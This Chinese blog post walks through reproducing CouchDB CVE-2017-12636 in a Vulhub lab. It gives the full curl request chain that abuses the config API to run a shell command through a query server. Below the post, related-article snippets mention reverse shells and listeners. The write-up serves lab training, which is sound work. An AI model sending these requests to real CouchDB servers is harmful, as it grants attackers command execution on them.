Vulhub靶场Couchdb 任意命令执行漏洞复现

最新推荐文章于 2024-06-20 15:50:26 发布
最新推荐文章于 2024-06-20 15:50:26 发布
阅读量286 收藏
点赞数
文章标签: couchdb 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/X_python321/article/details/132149687
版权

免责声明:本文仅用于技术交流和知识分享目的。漏洞复现涉及到系统和网络的安全性测试,可能导致系统崩溃、数据丢失或其他问题。读者在尝试漏洞复现之前必须获得合法授权,并自行承担一切风险和责任。

漏洞描述

Apache CouchDB是一个开源的 面向文档的 NoSQL数据库,用Erlang实现。

CouchDB 使用多种格式和协议来存储、传输和处理其数据。它使用JSON来存储数据,使用JavaScript作为其使用MapReduce 的查询语言,并使用HTTP作为API。由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置`query_server`,这个配置项在设计、执行view的时候将被运行。CVE-2017-12636

漏洞影响版本

小于 1.7.0 以及 小于 2.1.1

漏洞复现版本

1.6.0

复现过程

1:使用vulhub中靶场启动环境

2:浏览器访问http://your-ip:5984/_utils 

3:使用CVE-2017-12635创建管理员用户后,依次执行如下命令

curl -X PUT 'http://vulhub:vulhub@your-ip:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'

curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest'

curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'

curl -X POST 'http://vulhub:vulhub@your-ip:5984/vultest/_temp_view?limit=10' -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'

4:如图

5:最终进入vulhub靶场中此容器中的success文件验证是否命令执行成功

 

 

 

3ize0f
关注
vulhub通关实战一(附docker vulhub 虚拟机环境)
悦分享
12-26 2064
docker vulhub 虚拟机环境:docker-compose up -d 启动服务:登录7001端口用户名weblogic,密码Oracle@123。
vulhub-CVE-2018-1273远程命令执行漏洞复现
m0_62008601的博客
09-23 1438
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。看到靶机中已存在shll.elf文件。接着我们就需要开启监听,这时候用nc进行监听的话,收不到反弹的shell。发送命令之后返回500说明执行成功,接着我们登录到doker容器看到success文件成功被创建,说明漏洞存在。执行之后如果没成功反弹shell ,可以先执行赋予文件权限的命令。开启监听之后,再修改请求命令,让靶机执行木马文件上线。
001--什么是SpringData
weixin_42288943的博客
04-17 217
1.参考网址:https://blog.youkuaiyun.com/zgf19930504/article/details/50537198 2.核心内容: ** Spring Data **是Spring 的一个子项目, 旨在统一和简化对各类型持久化存储, 而不拘泥于是关系型数据库还是NoSQL 数据存储。无论是哪种持久化存储, 数据访问对象(或称作为DAO,...
CouchDB任意命令执行(CVE-2017-12636)
Kevin's Blog
07-26 1057
文章目录一、漏洞原理二、触发条件三、漏洞场景 / 挖掘思路四、漏洞复现4.1 漏洞环境4.2 启动环境4.3 攻击过程五、防御措施 一、漏洞原理   CountDB通过RESTful JavaScript Object Notation (JSON) API访问,CouchDB默认在5984开放Restful的API接口,用于数据库管理。由于CouchDB允许用户指定一个二进制程序或脚本,于Cou...
使用vulhub复现python反序列化漏洞
weixin_43733035的博客
04-02 524
原理: tcp/ip协议只支持字节数组的传输,不能直接传输对象。python的序列化和反序列化就是将一个类对象向字节流转化从而进行存储和传输,然后使用的时候再将字节流转化回原始的对象的一个过程。 参考: https://www.sohu.com/a/274879579_729271 复现过程: 打开网页会发现一个欢迎页面 显示的内容是hello {username},username是取cook...
Couchdb数据库-命令执行漏洞复现-CVE-2017-12636
apple_52661176的博客
08-31 307
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。0>&1""" #攻击机ip。开启vulfocus靶场环境。在攻击机上开启nc监听。
CouchDB 漏洞复现 CVE-2017-12635/12636
sechelper的博客
02-11 449
CouchDB的CVE-2017-12635和12636联合利用,详细漏洞复现,exp下载获取
Apache couchdb 命令执行 (CVE-2017-12636)复现
YouthBelief的博客
11-04 865
couchdb 命令执行 (CVE-2017-12636) couchdb 命令执行 (CVE-2017-12636)0x01 漏洞描述0x02 影响范围0x03 漏洞复现工具复现0x04 漏洞修复 couchdb 命令执行 (CVE-2017-12636) Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展
Couchdb 任意命令执行漏洞(CVE-2017-12636)
EC_Carrot的博客
05-24 417
漏洞背景 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令
vulhubCouchdb 任意命令执行漏洞(CVE-2017-12636)
qq_45300786的博客
09-14 925
特征 特征请参考我的上一篇帖子 【vulhubCouchdb 垂直权限绕过漏洞(CVE-2017-12635)漏洞复现 影响版本:小于 1.7.0 以及 小于 2.1.1 复现 注:复现中的很多东西也要用到这篇帖子,所以先看这篇 【vulhubCouchdb 垂直权限绕过漏洞(CVE-2017-12635)漏洞复现 再来看本篇帖子 该漏洞是需要登录用户方可触发,如果不知道目标管理员密码,可以利用CVE-2017-12635先增加一个管理员用户。 本次复现是用的版本1.6 http://192.168.1
Vulhub漏洞系列:Couchdb漏洞(CVE-2017-12635、CVE-2017-12636)
weixin_43072923的博客
05-24 1917
Vulhub漏洞系列:Couchdb漏洞(CVE-2017-12635、CVE-2017-12636)00.前言01.Couchdb简介02.漏洞描述03.漏洞复现 00.前言 这篇文章将对该漏洞进行简介并复现,同时简要说明Vulhub的使用方法,适合小白一起学习,大佬看看就好☺ 01.Couchdb简介 CouchDB是一个利用JSON文件来存贮数据,javascript作为MapReduce查询,以及常规HTTP作为API的且面向文档的开源数据库管理系统。 02.漏洞描述 0x01:CVE-2017
13 - vulhub - Couchdb 任意命令执行漏洞(CVE-2017-12636)
最新发布
m0_60721823的博客
06-20 864
小于 1.7.0 以及小于 2.1.1。
S2-001 远程代码执行漏洞复现
qq_43571759的博客
03-26 1216
S2-001 远程代码执行漏洞漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 搭建靶机环境: 1.进入v...
12 - vulhub - Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
易编橙 · 终身成长社群,相遇已是上上签!
10-21 531
Apache CouchDB是一个开源的NoSQL数据库,专注于易用性和成为“完全拥抱web的数据库”。它是一个使用JSON作为数据存储格式,javascript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞
12 - vulhub - Couchdb 垂直权限绕过漏洞(CVE-2024-12635)
m0_60452134的博客
04-12 445
Python崛起并且风靡,因为优点多、应用领域广、被大牛们认可。学习 Python 门槛很低,但它的晋级路线很多,通过它你能进入机器学习、数据挖掘、大数据,CS等更加高级的领域。Python可以做网络应用,可以做科学计算,数据分析,可以做网络爬虫,可以做机器学习、自然语言处理、可以写游戏、可以做桌面应用…Python可以做的很多,你需要学好基础,再选择明确的方向。这里给大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
利用Vulnhub复现漏洞 - Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
JiangBuLiu的博客
06-28 1235
Couchdb 垂直权限绕过漏洞(CVE-2017-12635)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/couchdb/CVE-2017-12635/ 漏洞原理 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格...
CVE-2022-24706 Apache CouchDB 远程命令执行漏洞
include_voidmain的博客
07-14 3223
CVE-2022-24706 Apache CouchDB 远程命令执行漏洞
服务攻防-数据库安全&Redis&CouchDB&H2database&未授权访问&CVE漏洞
SuperherRo的博客
01-23 1608
1、数据库-Redis-未授权RCE&CVE 2、数据库-Couchdb-未授权RCE&CVE 3、数据库-H2database-未授权RCE&CVE 章节点: 1、目标判断-端口扫描&组合判断&信息来源 2、安全问题-配置不当&CVE漏洞&弱口令爆破 3、复现对象-数据库&中间件&开发框架&应用协议
CouchDB常用的漏洞利用方法
05-27
3. 注入漏洞:攻击者可以向 CouchDB 服务器发送恶意数据,利用注入漏洞执行任意代码,从而控制服务器。 4. 配置错误漏洞:如果 CouchDB 服务器的配置存在错误,攻击者可以利用这些错误,绕过安全措施,访问和控制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值